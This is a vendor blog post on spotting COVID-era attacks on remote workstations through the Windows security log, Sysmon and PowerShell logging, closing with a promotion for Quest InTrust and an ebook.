As mentioned in an earlier post, COVID-19 phishing and malware campaigns are on the rise. Cyber criminals are exploiting the opportunity of today’s chaos:
- the flood of new endpoints connecting to your network via VPN,
- the subsequent and sudden reliance on Azure Active Directory to connect to endpoints and productivity services (outside of VPN),
- and a distracted remote user base wanting the latest coronavirus information.
They say opportunity favors the prepared and these bad actors are prepared. They’ve been running ransomware, other malware and phishing scams, drive-by downloads and pass-the-hash attacks for years. All they need do now is change the messaging to feed into our fear and appetite for COVID-19 intel.
What do all these attacks have in common? They start on user workstations. There are things you can — and should — do to mitigate this risk, like keeping applications on your endpoints properly patched and educating your users so they’re less likely to click malicious links in phishing emails, open attachments infected with ransomware viruses or insert USB drives of unknown provenance. But attackers are both sophisticated and relentless, so some of them will get inevitably through. You need to be able to catch attacks on your endpoints as early as possible so you can intervene before real damage is done. But how?
By carefully monitoring your workstations – and yes, especially during the chaos of your insta-remote workforce. If you’re using native tools, there are three critical logs you need to know how to use to improve endpoint security: the Windows security log, the Sysmon log and the PowerShell logs. Here’s a brief summary of the most important things you can learn from each of these logs.
How to spot these attacks
Window security log
The Windows security log is the only place you can get many critical events, including these:
- Local user and group enumeration — Malicious code often enumerates the local user accounts and local groups on the workstation to find useful credentials, so monitoring these events can help you spot malicious code before it can move laterally to other systems and use those credentials.
- Local account creation and group changes — Attackers also often create or modify local accounts and local groups (especially the local administrators group), so you want to keep an eye on these events.
- Logon attempts with local accounts — Users normally log on to their workstations using a domain account, so attempts to log in using a local account can be a great indicator of attacks.
- Logon with explicit credentials (event 4648) — Scheduled tasks often log on by explicitly specifying another account’s credentials — but scheduled tasks aren’t generally run on workstations. Therefore, this event can indicate an attacker trying to use credentials they've collected.
- When was the user physically present and active —Any activity on a workstation while it’s locked demands further investigation.
- Firewall configuration change — Sometimes applications add exceptions to the Windows firewall as they’re being installed. Exceptions don’t have to be deliberately malicious to create serious security gaps, so you have to keep a close eye on them.
- Plug-and-play device connections — Since malware often enters a workstation through USB drives or other plug-and-play devices, it’s essential to audit connections from all such devices.
Sysmon is a free service from Microsoft that monitors system activity and records it in a Windows event log, which is also called “Sysmon.” Here are a few of the events you should monitor there:
- Process creation — It’s not enough to simply look for obviously malicious processes; attackers can easily create a malicious program with the same name as a legitimate tool or modify an existing program to perform illicit actions. Sysmon provides a hash of the file’s contents so you can spot these sneaky attacks.
- Network connections — Monitoring network connections can also help you spot attackers. Sysmon helps you investigate by linking each connection to a process through the ProcessID and ProcessGUID fields, and providing details about the source and destination hosts.
- Registry changes — To ensure malicious code runs even after the workstation is rebooted, attackers often modify the registry. Sysmon will tell you who made the change, which computer they used, when it happened, the process ID, and the new name of any key or value that was renamed.
- File creation — You need to quickly spot and investigate suspicious file creation events. In particular, you should monitor autostart locations like the Startup folder, as well as temporary and download directories, where malware often appears during initial infection.
- DNS queries and executables – Remote workers using ISP DNS or home network router DNS are easy to compromise, allowing attackers to hijack DNS to steal user credentials or distribute malware. You will need to enable DNS logging on the workstation, and the you can monitor DNS queries and the executables that performed the query.
Hackers love to use PowerShell because it’s so powerful and a required tool for many client operating system and system management tasks. It’s critical to keep a close eye on PowerShell activity. Monitoring the two PowerShell logs will help you spot:
- Providers loaded — PowerShell providers are programs that make the data in a given data store available in PowerShell. Any unusual loading of providers could indicate malicious activity.
- Module logging — Module logging provides more detailed auditing that includes every command executed and all of its parameters (but not the output of the command).
- Script block logging — Script block logging shows every block of PowerShell code that was executed, which provides a lot more context than seeing each individual command. Even if a hacker tries to hide or obfuscate the command, this event will show the actual command that was executed.
If you’re ready to dig into the details, check out my ebook, “Top 3 Workstation: Logs to Monitor.” It will tell you exactly which event IDs to monitor and how to collect events from each log, and provide other valuable tips, like how to protect Sysmon from tampering.
How to stop these attacks
If that kind of log monitoring sounds like a lot of work, that’s because it is. Moreover, there’s a strong possibility that you’ll miss critical events, because it’s hard to collect logs from all your endpoints in a timely and efficient way (just how many laptops are in use in your organization?), and the logs are incomplete and as well as notoriously cryptic.
Furthermore, what do you do with those events when you find them? How do you respond when the activity has already happened? Isn’t it too late?
Unfortunately, native solutions to alert and stop these attacks in real time are limited. You’ll need to bring in a log management solution to help you make sense of the events as well as alert and respond immediately. Quest InTrust can help you dramatically improve endpoint protection (even those not on the VPN) while slashing IT workload and storage costs. InTrust enables you to easily trigger automated responses to suspicious events, like blocking the activity, disabling the offending user, reversing the change and/or enabling emergency auditing. For example, check out this video for how to defend against PowerShell attacks with automated response actions from InTrust.
With COVID-19 malicious attacks on the rise, now is the time to elevate workstation monitoring (even for those remote workers using home laptops or machines to stay productive during shelter-in-place orders). Learn more about the workstation logs to monitor as well as the actionable response for Quest InTrust in this ebook, “Top 3 Workstation: Logs to Monitor.”